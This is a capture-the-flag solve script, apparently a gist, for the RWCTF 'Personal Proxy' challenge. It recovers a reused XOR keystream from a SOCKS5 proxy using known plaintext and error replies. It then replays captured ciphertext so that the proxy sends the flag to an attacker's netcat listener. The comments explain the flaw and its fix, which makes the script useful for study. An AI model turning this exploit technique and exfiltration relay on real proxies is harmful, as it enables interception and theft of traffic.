RWCTF 3rd - Misc - Personal Proxy Solve Script
#!/usr/bin/env python3
import socket
import binascii
# https://github.com/zTrix/zio
from zio import *
def recover_one(target, block):
    '''
    send `invalid domain request` to make socks server reply with `Host unreachable`

    Recover one more keystream byte from the challenge's SOCKS proxy.

    target: (host, port) tuple handed to zio().
    block:  keystream bytes recovered so far (presumably an XOR pad; at least
            3 bytes, see recover_block1 for how the first 8 are seeded).
    Returns a single-byte `bytes` that extends `block` by one position.

    Every request byte that falls under the known part of the keystream is
    XORed with it; the tail is sent in the clear.  Which reply byte ends up
    under which keystream position is an assumption baked into the final
    index arithmetic -- see the NOTE at the return.
    '''
    io = zio(target, print_read=HEXDUMP_INDENT8, print_write=HEXDUMP)
    # SOCKS5 greeting (VER=5, NMETHODS=1, NO AUTH) encrypted with the first
    # three known keystream bytes.
    io.write(xor(b'\x05\x01\x00', block[:3]))
    # Method-selection reply (2 bytes); its content is not used here.
    io.read(2)
    # Size the domain so that the encrypted part of the CONNECT request
    # (4 header bytes + the length byte + (domain_length - 1) 'x's) consumes
    # exactly block[3:] -- this arithmetic only works if l8() yields 1 byte.
    domain_length = len(block) - 7
    # CONNECT (CMD=1) with ATYP=3 (domain name).  Everything up to the
    # second-to-last domain byte is XORed with the known keystream; the last
    # 'x' and the port 0x1f40 are appended unencrypted because no keystream
    # is known for those positions yet.
    io.write(xor(b'\x05\x01\x00\x03' + l8(domain_length) + (b'x' * (domain_length - 1)), block[3:]) + b'x\x1f\x40')
    reply = io.read()
    io.close()
    # NOTE(review): reply[-3] and block[-1] assume the reply echoes the
    # request's address bytes and that the reply's keystream position lines
    # up with the request's -- confirm against the proxy's reply layout
    # before reusing this elsewhere.
    return bytes([reply[-3] ^ ord('x') ^ block[-1]])
def recover_block1(target):
    '''
    Seed the known keystream from captured traffic, then extend it to 14 bytes.

    The first 8 bytes come from known-plaintext pairs: hard-coded captured
    ciphertext XORed with the well-known SOCKS5 bytes it must decrypt to.
    Six more bytes are then recovered one at a time via recover_one.
    Returns the 14-byte `bytes` block that fire() requires.

    What makes this possible is that the proxy apparently reuses one XOR
    keystream across connections and in both directions, so a keystream
    learned from one session encrypts valid traffic in another.  A design
    with a per-connection, per-direction nonce (or an AEAD mode) would not
    leak this way.
    '''
    block = b''
    # ciphertext ^ plaintext = keystream.  The captured replies decrypt to
    # the SOCKS5 method-selection reply (VER=5, METHOD=0) ...
    block += xor(b'\x78\x07', b'\x05\x00') # first reply
    block += xor(b'\xce\xa3', b'\x05\x00') # first 2 bytes of second reply
    # ... and the captured request to a CONNECT with ATYP=1 (IPv4).
    block += xor(b'\x09\x2b\x82\xce', b'\x05\x01\x00\x01') # first 4 bytes of second request
    # Each round opens a fresh connection and appends one byte: 8 + 6 = 14.
    for i in range(6):
        c = recover_one(target, block)
        block += c
    return block
def fire(key, target, remote_server):
    '''
    Replay the captured encrypted payload through the proxy towards
    remote_server, using the recovered keystream for the SOCKS handshake.

    key:           recovered keystream bytes; the first 14 encrypt the
                   4-byte greeting and the 10-byte IPv4 CONNECT request.
    target:        (host, port) of the proxy, passed to zio().
    remote_server: (ip, port) the proxy should connect to; ip must be a
                   dotted-quad string (socket.inet_aton).
    Returns None; the outcome is observed on the listener at remote_server.
    Raises AssertionError when fewer than 14 key bytes are supplied.
    '''
    assert len(key) >= 14
    io = zio(target, print_read=HEXDUMP_INDENT8, print_write=HEXDUMP)
    # Greeting: VER=5, NMETHODS=2, methods 0x00 and 0x01 -- 4 bytes, so it
    # matches the 4-byte greeting the captured session used and key[0:4]
    # lines up with it.
    io.write(xor(b'\x05\x02\x00\x01', key[0:4]))
    io.read(2)
    remote_host = socket.inet_aton(remote_server[0])
    # b16() comes from zio; presumably a 2-byte big-endian port -- verify.
    remote_port = b16(remote_server[1])
    # CONNECT, ATYP=1 (IPv4): 4 + 4 + 2 = 10 bytes, encrypted with key[4:14].
    io.write(xor(b'\x05\x01\x00\x01' + remote_host + remote_port, key[4:14]))
    # Consume 8 bytes of the CONNECT reply before sending the payload.
    io.read(8)
    # Captured ciphertext of the original client's payload, relayed verbatim;
    # presumably the proxy decrypts it with the same keystream the original
    # session was encrypted under.
    encrypted = b'''
7e c2 f5 a6 54 c8 6b 20 84 2b 79 1c 1a 53 a6 09
38 32 0f 68 54 f6 ac a2 47 b9 25 c6 30 db 5d e0
ed 48 9d ca 44 a7 5b 3c f4 8c 14 c2 00 c5 bf 2e
e2 71 32 d8 02 90 5d f1 5f 4e da 52 8c d7 e4 58
5f 49 5c 22 40 25 05 d6 19 f7 81 9b aa 1c 54 62
51 06 d5 76 7d 62 db 32 e2 44 08 f9 4a 2c 44 30
db 00 89 7c 42 ff 20 db a2 e8 c6 cf 69 86 fd 1f
1a c8 88 c1 94 6b bb 65 cd c6 14 38 f0 10 d5 32
62 f9 3a 67 23 c4 56 8a b4 9b 97 41 ca 8c 56 e7
b8 aa 9a ca fe 5f cd 36 7b d7 90 d2 46 e4 24 60
b9 64 7d e8 84 4d 4f fd 57 30 44 a9 d9 1d a1 ef
af c8 e3 df a6 fc f4 44 28 53 50 38 24 53 93 2b
04 f8 42 9d ae fb 58 46 d4 c2 01 9c fe e0 f1 11
8b a3 e8 be 21 dd c0 ee b3 63 22 a6 91 3e 6f 60
bd 2b e5 9a 62 f4 40 89 35 99 bf c3 19 5e 25 78
ae 1f f2 60 88 72 6c e5 73 9e 90 40 71 01 38 ae
fe e3 4c 27 55 2e 8e 0f 62 a6 c8 d3 05 42 a4 30
77 ba ef 9a 17 2a 3e 0b ab c9 af 33 1d 17 e0 c4
70 4d 9f 0c 76 42 d4 60 30 08 c1 99 00 21 b9 a5
bd 6b 89 c8 c0 9d 60 d8 e7 5a f0 21 09 74 09 87
f5 8c ae 47 13 ca d9 2f ef 9c 0c cc 5a 09 45 22
90 4e da 75 10 bf 94 27 6e ef 5c c8 73 62 a5 64
77 ba e3 80 33 69 ea 4f f8 1c d4 df 24 74 82 76
a5 a1 77 68 41 f4 30 93 91 52 2e bf 0f a2 22 f2
0e 2f e3 3d 6b 81 f3 71 e3 54 79 ba 03 a4 d6 b5
39 c4 92 aa 92 ab da 62 cb b0 16 73 04 f2 82 6c
03 07 b5 6b a8 51 31 63 e4 67 78
'''
    # Strip the hexdump layout (spaces, newlines) and decode to raw bytes.
    encrypted = encrypted.replace(b' ', b'').replace(b'\n', b'')
    encrypted = binascii.unhexlify(encrypted)
    io.write(encrypted)
    # Drain whatever comes back for up to 3 seconds, then hang up.
    io.read_until_timeout(3)
    io.close()
# Competition endpoint as published in the original write-up.
target_server = ('13.52.88.46', 50000)
block = recover_block1(target_server)
print('first block:', binascii.hexlify(block))
# setup a nc server to receive flag
# nc -l 9999
# Listener that receives the relayed payload; it must be reachable from the
# proxy, which is why the author's private address below has to be replaced.
remote_server = ('10.20.21.50', 9999) # modify addr to your server addr/port
fire(block, target_server, remote_server)
@Cirn09

Cirn09 commented Jan 12, 2021
